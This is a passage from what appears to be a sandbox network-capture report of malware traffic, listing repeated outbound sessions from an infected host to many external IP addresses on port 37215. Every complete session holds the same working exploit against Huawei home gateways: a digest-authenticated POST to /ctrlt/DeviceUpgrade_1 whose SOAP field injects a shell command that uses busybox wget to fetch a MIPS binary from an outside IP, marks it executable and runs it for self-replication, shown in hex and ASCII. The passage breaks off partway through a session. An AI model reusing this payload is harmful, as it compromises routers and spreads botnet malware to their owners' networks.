                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2272192.168.2.2336054157.205.7.17837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578052044 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2273192.168.2.235051641.31.20.13137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578063965 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2274192.168.2.2337774157.18.142.22337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578071117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2275192.168.2.2334876157.91.79.16937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578071117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2276192.168.2.2338760157.119.226.25237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578444958 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2277192.168.2.2356248157.204.136.25237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578454971 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2278192.168.2.2333450197.211.46.2937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578563929 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2279192.168.2.2353542157.63.39.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578622103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2280192.168.2.2347772157.193.135.3837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578624964 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2281192.168.2.2337290197.47.185.20337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578624964 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
